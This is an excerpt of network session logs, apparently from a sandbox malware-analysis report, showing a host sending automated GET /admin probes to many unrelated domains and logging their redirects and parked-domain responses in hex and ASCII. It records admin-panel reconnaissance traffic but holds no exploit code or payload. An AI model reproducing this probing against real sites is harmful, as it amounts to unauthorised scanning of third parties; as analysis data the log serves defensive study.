Nov 30, 2023 11:22:49.923361063 CET	216	OUT	GET /admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:50.102159023 CET	437	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:50 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
273	192.168.2.4	63236	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:50.203061104 CET	218	OUT	GET /admin/ HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:50.302762032 CET	877	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:50 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_g8DSqExvI9XTLZJfvYT+ONGIIE8LMHxjhsaRh2mPOiQHwkxLwoc33EY0cT+KxajdUU9ksniwBzRPkP7lPsOCRw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
274	192.168.2.4	62929	194.63.248.47	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:50.247191906 CET	216	OUT	GET /admin HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:50.449791908 CET	522	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:50 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/admin Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/admin">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
275	192.168.2.4	62855	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:50.247191906 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:50.427289963 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:50 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
276	192.168.2.4	62856	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:50.247947931 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:50.427740097 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:50 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
277	192.168.2.4	63404	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:50.479268074 CET	218	OUT	GET /admin HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:50.655227900 CET	233	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:50 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://hul.co.uk/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Nov 30, 2023 11:22:50.656451941 CET	213	OUT	GET / HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:50.835760117 CET	1340	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:50 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://www.hul.co.uk Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:50 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=su6tc4a7n9kq9bdu75jb3q4q74; path=/ Content-Length: 4111 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 20 79 73 6d 2f 20 2d 2d 3e 0a 3c 21 2d 2d 20 68 75 6c 2e 63 6f 2e 75 6b 20 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 48 55 4c 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2f 62 61 73 65 2e 63 73 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 6c 2e 63 6f 2e 75 6b 20 7c 20 53 65 61 72 63 68 20 66 6f 72 20 65 76 65 72 79 74 68 69 6e 67 20 68 75 6c 20 72 65 6c 61 74 65 64 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 3c 21 2d 2d 0a 09 09 66 75 6e 63 74 69 6f 6e 20 61 64 64 5f 73 65 61 72 63 68 5f 74 72 65 6e 64 73 28 6b 65 79 77 6f 72 64 73 29 0a 09 09 7b 09 0a 09 09 09 76 61 72 20 77 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 61 69 6e 5f 63 6f 6e 74 65 6e 74 27 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 09 09 09 76 61 72 20 74 72 65 6e 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 61 72 63 68 5f 74 72 65 6e 64 73 5f 66 72 61 6d 65 27 29 3b 0a 09 09 09 76 61 72 20 73 63 72 69 70 74 5f 73 72 63 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 72 65 6e 64 73 2f 66 65 74 63 68 43 6f 6d 70 6f 6e 65 6e 74 3f 68 6c 5c 37 35 65 6e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>... ysm/ -->... hul.co.uk --><head><title>Welcome to HUL.co.uk</title><meta http-equiv="imagetoolbar" content="no" /><link rel="stylesheet" type="text/css" href="styles/base.css" /><meta name="description" lang="en" content="hul.co.uk \| Search for everything hul related" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script type="text/javascript">...function add_search_trends(keywords){var width = document.getElementById('main_content').offsetWidth;var trends = document.getElementById('search_trends_frame');var script_src = "http://www.google.com/trends/fetchComponent?hl\75en
Nov 30, 2023 11:22:50.835799932 CET	1340	IN	Data Raw: 2d 47 42 5c 34 36 71 5c 37 35 22 2b 6b 65 79 77 6f 72 64 73 2b 22 5c 34 36 67 65 6f 5c 37 35 47 42 5c 34 36 63 6d 70 74 5c 37 35 71 5c 34 36 63 6f 6e 74 65 6e 74 5c 30 37 35 31 5c 34 36 63 69 64 5c 37 35 54 49 4d 45 53 45 52 49 45 53 5f 47 52 41 Data Ascii: -GB\46q\75"+keywords+"\46geo\75GB\46cmpt\75q\46content\0751\46cid\75TIMESERIES_GRAPH_0\46export\0755\46w\075"+width+"\46h\075360";trends.setAttribute('src', script_src);trends.setAttribute('width',width);return false;}--></
Nov 30, 2023 11:22:50.835836887 CET	1340	IN	Data Raw: 65 20 66 6f 72 20 73 61 6c 65 20 6f 72 20 6c 65 61 73 65 3c 2f 61 3e 3c 2f 68 32 3e 0a 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 48 55 4c 2e 63 6f 2e 75 6b 2c 20 70 6c 65 61 73 65 20 63 6c Data Ascii: e for sale or lease</a></h2><p>If you are interested in HUL.co.uk, please click <a href="/buy-this-domain.php">here</a> to find out more</p></div><div style="clear: both;"></div><div style="clear: both;"></div>
Nov 30, 2023 11:22:50.835896969 CET	735	IN	Data Raw: 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 75 62 6d 69 74 20 26 72 61 71 75 6f 3b 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 09 09 0a 09 3c 2f Data Ascii: ="submit" value="Submit »"></div></div><div class="clear"></div></fieldset></form></div><br/></div> ... notice-beige --></div> ... content --></div> ... bd --><div class="clear"></div><di

Session ID	Source IP	Source Port	Destination IP	Destination Port
278	192.168.2.4	63478	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:50.595942020 CET	220	OUT	GET /admin/ HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:50.710566044 CET	569	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.139992723=2c9bbec4-c8c4-41bb-aea4-6342526e8c37; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:23 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
279	192.168.2.4	64024	192.99.158.243	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:50.888999939 CET	222	OUT	GET /admin/ HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:51.003248930 CET	564	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.651070=1d91bf9c-3b0c-4b17-9456-be8664d871bf; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:23 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
280	192.168.2.4	64334	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:51.198339939 CET	217	OUT	GET / HTTP/1.1 Host: www.hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:51.380235910 CET	1340	IN	HTTP/1.1 200 OK Date: Thu, 30 Nov 2023 10:22:51 GMT Server: Apache/2.4.57 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:51 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=irufpb5s84jgopi3854qdchjq1; path=/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1625 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii: W[S8~N~:&$m!P0GXE$2{t)0m\|2zqhd(Ec34K-ihz:b1XGo24l~3tL#s6G/-U0]QA=JI7T32NXJ@(rw@TZ9Bk8"@a`_#I8PzMtBGJK`J%4<@8 ue/tIL-K]P>74X+k8-&]E%Qp3p@z<!J,z'3_yS,Vgj,BfjGK.e"K@22bV)=sp62YCrkwfJ s!"AcrH x?:x9pho1KgwofK3~^NN/o.>pE!--"xe]f`n`Mq215ecfR+wrdZrc9"'GKQ"%Ly75r`2-p4fRd\5dsq8;j,NI<Qa3Yl48sNEHE&auP3p-flSsaj+sSM.42)]RiP{ doWI
Nov 30, 2023 11:22:51.380276918 CET	833	IN	Data Raw: ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf 23 88 56 ee f2 0b ff dd 6f a2 d2 6a 7d 90 d1 21 e6 98 2d 35 4d 95 cd ed 1a 6a 03 00 f8 a9 82 8d 05 6e 15 c3 4f 95 42 84 e2 1a a7 29 98 71 f5 21 1c be df df 1b be 7b 0b d5 f8 Data Ascii: 0&qUQmptnAq#Voj}!-5MjnOB)q!{.&sbqm\808&ron#CI9b>;'rzlzpmu&:jrkA#FhzV(D-f\!5*9Zhc<

Session ID	Source IP	Source Port	Destination IP	Destination Port
281	192.168.2.4	64445	54.209.32.212	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:51.218101025 CET	219	OUT	GET /admin/ HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:51.317339897 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:51 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
282	192.168.2.4	64845	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:51.968272924 CET	216	OUT	GET /admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:52.147752047 CET	437	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:52 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
283	192.168.2.4	64844	194.63.248.47	80

Timestamp	Bytes transferred	Direction	Data
